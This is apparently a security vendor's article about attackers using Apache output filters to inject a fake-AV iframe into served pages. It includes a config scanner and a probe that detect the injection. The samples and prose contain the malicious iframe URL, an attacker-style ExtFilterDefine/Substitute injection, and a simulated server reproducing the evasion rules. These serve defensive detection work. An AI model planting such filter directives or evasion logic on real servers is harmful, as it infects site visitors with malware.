• Apache Used to Inject Malware

    Malware authors are constantly coming up with new ways to compromise web sites. Web sites are now the weakest link in the security chain: malicious hackers break into them and then use them to distribute malware to visitors. The infected PCs are in turn recruited into bot networks. Customer data and the reputation of the web site and of the online business behind it are at stake. In this article we highlight a relatively new way in which hackers infect web sites.

    Apache Filter Based Malware
    We have recently noted a new development in web malware. Malicious hackers have begun using the Apache web server's output filter mechanism to inject malware into web pages as they are served. This works much as if the mailman stuck a piece of gum (highly unlikely in real life) on the clean envelope you dropped into the mailbox. The recipient might complain to you about the gum (the malware), and most people would be at a loss to determine whether it came from you or was added in transit.

    This is exactly the confusion malicious hackers capitalize on. Apache is one of the most popular web servers in use today. It is extremely flexible, scalable and reliable, which makes it a natural choice for webmasters, web hosts and web site owners. Malicious hackers are banking on that popularity to get the most bang for their buck.

    Through this flexibility, Apache offers programmers the ability to create "filters." A filter allows real-time analysis and modification of a web page's data as it passes through the server. If, for example, you wanted to add an advertisement to every page served from the web server, this functionality would be of great use. Now filters are being abused by malicious hackers, who use them to insert a snippet of malware containing an iframe like the one below.

    This piece of malware leads to a fake AV site:

    <iframe src="http://crocabhysanr4.cz.cc/[scrubbed]"></iframe>

    Although this is a relatively recent problem, researchers at Symantec have also reported on the same issue.

    Nuances
    To clarify, this new kind of malware injection does not imply that Apache itself is compromised or vulnerable. The Apache "filter" functionality is a legitimate feature that is being abused by malicious hackers who have already gained unauthorized access to the web server by other means. The attack is extremely effective because a single change to the server's configuration "infects" every page served without changing a single content file, so file-integrity checks on the document root show nothing.
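    Because the injected iframe never exists on disk, the place to look is the server configuration rather than the content. The following scanner is an added example written for this article (not code from the original page or from the Apache project): it walks httpd *.conf files and .htaccess files for directives that attach or define an output filter and for the modules that provide filters able to rewrite HTML (mod_ext_filter, mod_substitute, mod_sed, mod_filter). A filter defined by an external command (ExtFilterDefine cmd=...) or a Substitute rule carrying an iframe is rated suspicious; stock compression and SSI filters are rated benign; anything else is flagged for review. The sample httpd.conf and .htaccess fragments, the filter name "inj" and the path /tmp/.x/inject.sh are constructed for illustration. Note that SetOutputFilter and Substitute are both permitted in .htaccess (AllowOverride FileInfo), so a document-root .htaccess deserves the same scrutiny as the main configuration.

```python
import re
from pathlib import Path

# Directives that define or attach an Apache output filter (directive names are
# case-insensitive in Apache). Longer names come first so the regex prefers them.
FILTER_DIRECTIVES = (
    "AddOutputFilterByType", "AddOutputFilter", "SetOutputFilter",
    "ExtFilterDefine", "Substitute", "FilterDeclare", "FilterProvider", "FilterChain",
)
# Modules whose filters can rewrite an HTML response on the way out.
FILTER_MODULES = ("mod_ext_filter", "mod_substitute", "mod_sed", "mod_filter")
# Filters that belong in a stock configuration (compression, server-side includes).
BENIGN_FILTERS = {"DEFLATE", "INFLATE", "INCLUDES", "BROTLI_COMPRESS", "RATE_LIMIT", "CACHE"}

DIRECTIVE_RE = re.compile(r"^\s*(" + "|".join(FILTER_DIRECTIVES) + r")\b(.*)$", re.I)
LOADMODULE_RE = re.compile(r"^\s*LoadModule\s+\S+\s+(\S+)", re.I)


def classify(directive: str, args: str) -> str:
    """Rate a filter directive as 'suspicious', 'benign' or 'review'."""
    # An external command, or HTML markup inside the directive itself, is how an
    # injected iframe reaches the output stream.
    if re.search(r"\bcmd=|<iframe|<script", args, re.I):
        return "suspicious"
    if directive.lower() in ("setoutputfilter", "addoutputfilter", "addoutputfilterbytype"):
        parts = args.split()
        names = parts[0].split(";") if parts else []  # filter chains use ';'
        if names and all(n.upper() in BENIGN_FILTERS for n in names):
            return "benign"
    return "review"


def scan_config_text(text: str, origin: str) -> list[dict]:
    """Return one finding per filter-related line of an Apache config or .htaccess."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOADMODULE_RE.match(line)
        if m and any(mod in m.group(1) for mod in FILTER_MODULES):
            findings.append({"file": origin, "line": lineno, "kind": "module", "text": line.strip()})
            continue
        m = DIRECTIVE_RE.match(line)
        if m:
            findings.append({"file": origin, "line": lineno,
                             "kind": classify(m.group(1), m.group(2)), "text": line.strip()})
    return findings


def scan_tree(root: Path) -> list[dict]:
    """Walk a config directory or document root for *.conf and .htaccess files."""
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and (path.suffix == ".conf" or path.name == ".htaccess"):
            findings.extend(scan_config_text(path.read_text(errors="replace"), str(path)))
    return findings


# Constructed httpd.conf fragment: an attacker-added external filter next to a
# legitimate compression filter.
SAMPLE_CONF = """\
# constructed httpd.conf fragment for illustration
LoadModule rewrite_module modules/mod_rewrite.so
LoadModule ext_filter_module modules/mod_ext_filter.so
<Directory "/var/www/html">
    # attacker-added: pipe every HTML page through a script that appends an iframe
    ExtFilterDefine inj mode=output intype=text/html cmd="/tmp/.x/inject.sh"
    SetOutputFilter inj
</Directory>
AddOutputFilterByType DEFLATE text/html
"""

# Constructed .htaccess: the same effect achieved with mod_substitute, which needs
# no external program and only FileInfo override rights.
SAMPLE_HTACCESS = """\
# constructed .htaccess in the document root
RewriteEngine On
SetOutputFilter SUBSTITUTE
Substitute "s|</body>|<iframe src='http://crocabhysanr4.cz.cc/[scrubbed]'></iframe></body>|i"
"""

if __name__ == "__main__":
    for f in scan_config_text(SAMPLE_CONF, "httpd.conf") + scan_config_text(SAMPLE_HTACCESS, ".htaccess"):
        print(f"{f['kind']:<10} {f['file']}:{f['line']}: {f['text']}")
```

    Run scan_tree(Path("/etc/httpd")) and scan_tree(Path("/var/www")) on a suspect host and compare the output with the configuration you expect; a "review" finding for a filter name you do not recognise is as interesting as a "suspicious" one, since the attacker chooses the name.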

    In the past there has been .htaccess based malware which tries to evade detection by serving infected pages only when a user arrives at the compromised site through a search engine such as Google. The filter-based malware is much more sophisticated. It injects malware into the HTML pages leaving the web server, but only according to the following rules.

    The malware is not injected into outgoing web pages if:

    • The incoming HTTP request comes from an IP address that belongs to a search engine
    • The incoming HTTP request carries one of certain browser User-Agent strings
    • The administrator is logged in to the server, or a process owned by the administrator is running

    Additionally, the very first time a user requests a page, a session token is created for the connection, but the malware is not delivered on that first request. It is delivered on the second request that the same user makes within the same session. Interestingly, the malware is served to a given visitor only once: the user's IP address is added to a list so that the same host is not targeted again. Because the injected content is never seen on a first visit and is served only once per host, an anti-virus scanner that fetches the page has a much lower chance of ever observing and detecting it.
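    Those delivery rules also dictate how to check a site for this injection: a single fetch, a fetch without cookies, or a fetch from a crawler address will all come back clean. The probe below is an added example written for this article, not code from the original page. It requests the same URL several times in one session, replaying whatever cookie the server set, with a desktop browser User-Agent (the string used is an assumption), and reports any iframe that appears in a later reply but not in the first. The FakeInfectedSite class is a constructed stand-in for a server whose output filter follows the rules above (search-engine IP, crawler User-Agent, second request in the session, once per IP); the "administrator logged in" rule is not modelled because the probe cannot observe it. Its IP addresses, session cookie name SESS and the fetch signature fetch(url, headers) -> (status, headers, body) are assumptions; urllib_fetch is the same interface over a live connection for use against a real site.

```python
import re
import urllib.request
from http.cookies import SimpleCookie
from typing import Callable, Optional

IFRAME_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
# Assumption: an ordinary desktop browser string the filter will not treat as a crawler.
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"


def iframe_sources(html: str) -> set[str]:
    """All iframe src values in a page."""
    return set(IFRAME_RE.findall(html))


def urllib_fetch(url: str, headers: dict) -> tuple:
    """Live fetcher: fetch(url, headers) -> (status, [(header, value), ...], body)."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.status, resp.getheaders(), resp.read().decode("utf-8", "replace")


def probe(fetch: Callable, url: str, user_agent: str = BROWSER_UA, attempts: int = 3) -> Optional[dict]:
    """Request url repeatedly within one session and report iframes missing from the first reply."""
    jar = SimpleCookie()
    baseline = None
    for n in range(1, attempts + 1):
        headers = {"User-Agent": user_agent}
        if jar:  # replay the session token the server handed out
            headers["Cookie"] = "; ".join(f"{k}={m.value}" for k, m in jar.items())
        _status, resp_headers, body = fetch(url, headers)
        for k, v in resp_headers:
            if k.lower() == "set-cookie":
                jar.load(v)
        frames = iframe_sources(body)
        if baseline is None:  # the first reply is the clean reference per the rules above
            baseline = frames
        elif frames - baseline:
            return {"request": n, "injected": sorted(frames - baseline)}
    return None


class FakeInfectedSite:
    """Constructed server that injects only on the second request of a session,
    never to crawler IPs or User-Agents, and only once per client IP."""
    SEARCH_ENGINE_IPS = {"66.249.66.1"}          # illustrative crawler address
    BOT_UA = ("Googlebot", "bingbot")
    CLEAN = "<html><body><p>Welcome</p></body></html>"
    INJECT = '<iframe src="http://crocabhysanr4.cz.cc/[scrubbed]" width=1 height=1></iframe>'

    def __init__(self, client_ip: str = "203.0.113.7"):  # assumed visitor address
        self.client_ip = client_ip
        self.sessions: dict = {}   # session id -> requests seen
        self.served: set = set()   # IPs that already received the payload
        self.next_id = 0

    def __call__(self, url: str, headers: dict) -> tuple:
        ua = headers.get("User-Agent", "")
        m = re.search(r"SESS=(\w+)", headers.get("Cookie", ""))
        resp_headers = []
        if m and m.group(1) in self.sessions:
            sid = m.group(1)
        else:
            self.next_id += 1
            sid = f"s{self.next_id}"
            self.sessions[sid] = 0
            resp_headers.append(("Set-Cookie", f"SESS={sid}; Path=/"))
        self.sessions[sid] += 1
        deliver = (self.client_ip not in self.SEARCH_ENGINE_IPS
                   and not any(b in ua for b in self.BOT_UA)
                   and self.sessions[sid] >= 2
                   and self.client_ip not in self.served)
        body = self.CLEAN
        if deliver:
            self.served.add(self.client_ip)
            body = body.replace("</body>", self.INJECT + "</body>")
        return 200, resp_headers, body


if __name__ == "__main__":
    print(probe(FakeInfectedSite(), "http://www.example.com/"))
```

    Against a live site use probe(urllib_fetch, "http://www.example.com/"), ideally from an address that has not visited the site before; a clean result from a host that already triggered the once-per-IP rule proves nothing, which is exactly the effect the rule is designed to have on scanners.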

    We Can Help!
    If you want to protect your site from infection, or you need additional support, please sign up for one of our services. Please contact us with your comments or questions.